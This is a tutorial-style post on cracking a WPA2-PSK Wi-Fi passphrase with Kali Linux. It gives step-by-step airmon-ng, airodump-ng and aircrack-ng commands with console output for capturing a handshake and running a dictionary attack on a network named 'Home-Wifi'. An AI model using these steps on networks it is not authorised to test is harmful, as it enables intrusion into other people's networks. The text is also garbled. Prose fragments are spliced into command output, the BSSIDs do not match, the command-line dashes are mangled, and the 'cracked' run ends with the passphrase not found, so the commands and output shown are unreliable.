Cracking WPA2-PSK with Kali Linux
(brute force with dictionary)
One of the most common attacks is against WPA2 is exploiting a weak passphrase.Hardware : Alfa AWUS051NH wifi adapter
The iwconfig command will show any wireless cards in the system.
# iwconfig wlan0 IEEE 802.11bgn ESSID:off/any Mode:Managed Access Point: Not-Associated Tx-Power=0 dBm Retry short limit:7 RTS thr:off Fragment thr:off Encryption key:off Power Management:off lo no wireless extensions. eth0 no wireless extensions. # ifconfig eth0: flags=4099create the monitor interface with the command:mtu 1500 ether 00:23:8b:f0:9e:eb txqueuelen 1000 (Ethernet) RX packets 0 bytes 0 (0.0 B) RX errors 0 dropped 0 overruns 0 frame 0 TX packets 0 bytes 0 (0.0 B) TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0 lo: flags=73 mtu 65536 inet 127.0.0.1 netmask 255.0.0.0 inet6 ::1 prefixlen 128 scopeid 0x10 loop txqueuelen 1 (Local Loopback) RX packets 1440 bytes 116640 (113.9 KiB) RX errors 0 dropped 0 overruns 0 frame 0 TX packets 1440 bytes 116640 (113.9 KiB) TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0 wlan0: flags=4099 mtu 1500 ether 00:26:5e:0f:a2:15 txqueuelen 1000 (Ethernet) RX packets 0 bytes 0 (0.0 B) RX errors 0 dropped 0 overruns 0 frame 0 TX packets 0 bytes 0 (0.0 B) TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0 # ifconfig wlan0 up # iwlist wlan0 scanning wlan0 Scan completed : Cell 01 - Address: 00:47:B7:70:1A:1E Channel:6 Frequency:2.437 GHz (Channel 6) Quality=47/70 Signal level=-63 dBm Encryption key:on ESSID:"Home-Wifi" Bit Rates:1 Mb/s; 2 Mb/s; 5.5 Mb/s; 11 Mb/s; 6 Mb/s 9 Mb/s; 12 Mb/s; 18 Mb/s Bit Rates:24 Mb/s; 36 Mb/s; 48 Mb/s; 54 Mb/s Mode:Master Extra:tsf=000003d892db3984 Extra: Last beacon: 472ms ago IE: Unknown: 0014546F7572696E67436C756252686F64616E69656E IE: Unknown: 010882848B960C121824 IE: Unknown: 030106 IE: Unknown: 0706465220010D14 IE: Unknown: 2A0100 IE: Unknown: 32043048606C IE: Unknown: 2D1AAD011BFFFF000000000000000000000000000000000000000000 IE: Unknown: 331AAD011BFFFF000000000000000000000000000000000000000000 IE: Unknown: 3D1606000100000000000000000000000000000000000000 IE: Unknown: 341606000100000000000000000000000000000000000000 IE: Unknown: DD180050F2020101860003A4000027A4000042435E0062322F00 IE: Unknown: DD0900037F01010000FF7F IE: IEEE 802.11i/WPA2 Version 1 Group Cipher : CCMP Pairwise Ciphers (1) : CCMP Authentication Suites (1) : PSK IE: Unknown: DDA90050F204104A0001101044000102103B000103104700
# airmon-ng start wlan0 Found 2 processes that could cause trouble. If airodump-ng, aireplay-ng or airtun-ng stops working after a short period of time, you may want to run 'airmon-ng check kill' PID Name 370 NetworkManager 489 wpa_supplicant PHY Interface Driver Chipset phy0 wlan0 ath9k Qualcomm Atheros AR9285 Wireless Network Adapter (PCI-Express) (rev 01) (mac80211 monitor mode vif enabled for [phy0] wlan0 on [phy0]wlan0mon) (mac80211 station mode vif disabled for [phy0]wlan0) # ifconfig eth0: flags=4099Use airodump-ng to capture the WPA2 handshake :mtu 1500 ether 00:23:8b:f0:9e:eb txqueuelen 1000 (Ethernet) RX packets 0 bytes 0 (0.0 B) RX errors 0 dropped 0 overruns 0 frame 0 TX packets 0 bytes 0 (0.0 B) TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0 lo: flags=73 mtu 65536 inet 127.0.0.1 netmask 255.0.0.0 inet6 ::1 prefixlen 128 scopeid 0x10 loop txqueuelen 1 (Local Loopback) RX packets 2560 bytes 207360 (202.5 KiB) RX errors 0 dropped 0 overruns 0 frame 0 TX packets 2560 bytes 207360 (202.5 KiB) TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0 wlan0mon: flags=4163 mtu 1500 unspec 00-26-5E-0F-A2-15-30-30-00-00-00-00-00-00-00-00 txqueuelen 1000 (UNSPEC) RX packets 5084 bytes 1056710 (1.0 MiB) RX errors 0 dropped 5084 overruns 0 frame 0 TX packets 0 bytes 0 (0.0 B) TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0
# airodump-ng wlan0mon – -bssid 00:47:B7:70:1A:1E – –channel 6 – –write CaptureWPA
(CaptureWPA is name of the file we will save to)
CH 6 ][ Elapsed: 54 s ][ 2017-04-29 12:00 BSSID PWR RXQ Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID 00:37:B7:80:1A:1E -65 100 571 0 0 6 54e. WPA2 CCMP PSK Home-Wifi BSSID STATION PWR Rate Lost Frames ProbeWhen is no client DATA = 0, so network with clients is to prefer.
or you must generate traffic with special techniques
# aircrack-ng CaptureWPA-01.cap -w BIG-WPA-LIST-1
(BIG-WPA-LIST-1name of your dictionary file)
The dictionary file darkc0de.lst is a popular worldlist that ships with BackTrack5
Kali does not come with the darkc0de.lst but you can download worldlist from the net.
Aircrack-ng 1.2 rc4 [03:58:23] 96564163/99563408 keys tested (7270.07 k/s) Time left: 0 seconds 96.99% Current passphrase: 8situarla Master Key : 8C D7 10 C7 F9 55 F3 31 42 8F 50 B3 D5 11 50 54 5A CD 7A 98 71 A6 13 7D 42 8F 82 2A E5 34 60 6D Transient Key : 4B 33 0F 6B 1C 4F 01 36 C8 B4 8C B2 3B 5D A1 13 7C D9 33 9E B1 A3 3B DA 0F F2 2F 6E E6 E3 0E 86 14 63 A6 1B 41 3D B2 79 21 12 51 06 6A EF 02 45 A7 CA 25 88 16 C8 85 68 34 80 4F 1A 84 D8 62 2F EAPOL HMAC : 9E 33 72 A4 20 1C 53 BC 8A 50 33 35 F9 75 77 1A Passphrase not in dictionary